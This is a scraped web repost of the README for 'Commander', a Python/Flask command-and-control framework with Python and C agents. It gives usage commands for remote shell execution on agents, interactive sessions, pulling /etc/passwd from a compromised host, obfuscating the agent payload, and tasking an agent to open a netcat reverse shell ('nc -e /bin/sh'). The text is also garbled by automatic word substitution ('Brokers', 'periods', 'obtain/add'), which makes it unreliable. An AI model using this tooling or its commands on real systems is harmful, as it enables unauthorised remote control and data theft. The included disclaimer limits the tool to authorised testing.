13.1 C
Saturday, October 21, 2023

A Command And Management (C2) Server

Commander is a command and management framework (C2) written in Python, Flask and SQLite. It comes with two brokers written in Python and C.

Beneath Steady Improvement

Not script-kiddie pleasant


  • Absolutely encrypted communication (TLS)
  • A number of Brokers
  • Obfuscation
  • Interactive Periods
  • Scalable
  • Base64 knowledge encoding
  • RESTful API


  • Python 3
    • The python agent helps:
      • periods, an interactive shell between the admin and the agent (like ssh)
      • obfuscation
      • Each Home windows and Linux techniques
      • obtain/add information performance
  • C
    • The C agent helps solely the essential performance for now, the management of duties for the brokers
    • Just for Linux techniques


Python >= 3.6 is required to run and the next dependencies

Linux for the admin.py and c2_server.py. (Untested for home windows)
apt set up libcurl4-openssl-dev libb64-dev
apt set up openssl
pip3 set up -r necessities.txt

The right way to Use it

First create the required certs and keys

# if you wish to safe your key with a passphrase exclude the -nodes
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

Begin the admin.py module first with a view to create a neighborhood sqlite db file

Proceed by working the server

And final the agent. For the python case agent you possibly can simply run it however within the case of the C agent you should compile it first.

# python agent
python3 agent.py

# C agent
gcc agent.c -o agent -lcurl -lb64

By default each the Brokers and the server are working over TLS and base64. The communication level is ready to and in case a distinct level is required it needs to be modified in Brokers supply information.

Because the Operator/Administrator you need to use the next instructions to manage your brokers


job add arg c2-commands
Add a job to an agent, to a gaggle or on all brokers.
arg: can have the next values: 'all' 'kind=Linux|Home windows' 'your_uuid'
c2-commands: potential values are c2-register c2-shell c2-sleep c2-quit
c2-register: Triggers the agent to register once more.
c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
cmd: The command to execute.
c2-sleep: Configure the interval that an agent will examine for duties.
c2-session port: Instructs the agent to open a shell session with the server to this port.
port: The port to connect with. If it's not offered it defaults to 5555.
c2-quit: Forces an agent to stop.

job delete arg
Delete a job from an agent or all brokers.
arg: can have the next values: 'all' 'kind=Linux|Home windows' 'your_uuid'
present agent arg
Shows inf o for all of the availiable brokers or for particular agent.
arg: can have the next values: 'all' 'kind=Linux|Home windows' 'your_uuid'
present job arg
Shows the duty of an agent or all brokers.
arg: can have the next values: 'all' 'kind=Linux|Home windows' 'your_uuid'
present end result arg
Shows the historical past/results of an agent or all brokers.
arg: can have the next values: 'all' 'kind=Linux|Home windows' 'your_uuid'
discover energetic brokers
Drops the database in order that the energetic brokers shall be registered once more.

Bye Bye!


periods server arg [port]
Controls a session handler.
arg: can have the next values: 'begin' , 'cease' 'standing'
port: port is non-compulsory for the beginning arg and if it's not offered it defaults to 5555. This argument defines the port of the periods server
periods choose arg
Choose by which session to connect.
arg: the index from the 'periods record' end result
periods shut arg
Shut a session.
arg: the index from the 'periods record' end result
periods record
Shows the availiable periods
local-ls listing
Lists in your host the information on the chosen listing
obtain 'file'
Downloads the 'file' domestically on the present listing
add 'file'
Uploads a file within the listing the place the agent at the moment is

Particular consideration needs to be given to the ‘discover energetic brokers’ command. This command deletes all of the tables and creates them once more. It would sound scary however it’s not, not less than that’s what i imagine 😛

The concept behind this performance is that the c2 server can request from an agent to re-register on the case that it would not acknowledge him. So, since we need to clear the db from unused outdated entries and on the identical time discover all of the at the moment energetic hosts we are able to drop the tables and set off the re-register mechanism of the c2 server. See under for the re-registration mechanism.


Under you’ll find a traditional circulation diagram

Regular Circulate

In case the place the surroundings experiences a serious failure like a corrupted database or another vital failure the re-registration mechanism is enabled so we do not lose our reference to our brokers.

Extra particularly, in case the place we lose the database we is not going to have any details about the uuids that we’re receiving thus we won’t set duties on them and so forth… So, the brokers will maintain attempting to retrieve their duties and since we do not acknowledge them we’ll ask them to register once more so we are able to insert them in our database and we are able to management them once more.

Under is the circulation diagram for this case.

Re-register Circulate

Helpful examples

To setup your surroundings begin the admin.py first after which the c2_server.py and run the agent. After you possibly can examine the availiable brokers.

# present all availiable brokers
present agent all

To instruct all of the brokers to run the command “id” you are able to do it like this:

To examine the historical past/ earlier outcomes of executed duties for a particular agent do it like this:

# examine the outcomes of a particular agent
present end result 85913eb1245d40eb96cf53eaf0b1e241

You may as well change the interval of the brokers that checks for duties to 30 seconds like this:

# to set it for all brokers
job add all c2-sleep 30

To open a session with a number of of your brokers do the next.

# discover the agent/uuid
present agent all

# allow the server to just accept connections
periods server begin 5555

# add a job for a session to your prefered agent
job add your_prefered_agent_uuid_here c2-session 5555

# show a listing of accessible connections
periods record

# choose to connect to one of many periods, lets choose 0
periods choose 0

# run a command

# obtain the passwd file domestically
obtain /and so forth/passwd

# record your information domestically to examine that passwd was created

# add a file (take a look at.txt) within the listing the place the agent is
add take a look at.txt

# return to the primary cli

# examine if the server is working
periods server standing

# cease the periods server
periods server cease

If for some cause you need to run one other exterior session like with netcat or metaspolit do the next.

# present all availiable brokers
present agent all

# first open a netcat in your machine
nc -vnlp 4444

# add a job to open a reverse shell for a particular agent
job add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 4444

This fashion you’ll have a ‘die arduous’ shell that even when you get disconnected it’s going to get again up instantly. Solely the interactive instructions will make it die completely.


The python Agent provides obfuscation utilizing a primary AES ECB encryption and base64 encoding

Edit the obfuscator.py file and alter the ‘key’ worth to a 16 char size key with a view to create a customized payload. The output of the brand new agent might be present in Brokers/obs_agent.py

You’ll be able to run it like this:

python3 obfuscator.py

# and to run the agent, do as normal
python3 obs_agent.py

Ideas &Methods

  1. The build-in flask app server cannot deal with a number of/concurrent requests. So, you need to use the gunicorn server for higher efficiency like this:
gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b --certfile server.crt --keyfile server.key 
  1. Create a binary file on your python agent like this
pip set up pyinstaller
pyinstaller --onefile agent.py

The binary might be discovered beneath the dist listing.

In case one thing fails it’s possible you’ll have to replace your python and pip libs. If it continues failing then ..properly.. life occurred

  1. Create new certs in every engagement

  2. Backup your c2.db, it’s simple… only a file


pytest was used for the testing. You’ll be able to run the checks like this:

Watch out: You could run the checks contained in the checks listing in any other case your c2.db shall be overwritten and you’ll lose your knowledge

To examine the code protection and produce a pleasant html report you need to use this:

# pip3 set up pytest-cov
python -m pytest --cov=Commander --cov-report html

Disclaimer: This software is just meant to be a proof of idea demonstration software for approved safety testing. Operating this software in opposition to hosts that you just should not have specific permission to check is unlawful. You might be answerable for any bother it’s possible you’ll trigger by utilizing this software.

Latest news
Related news


Please enter your comment!
Please enter your name here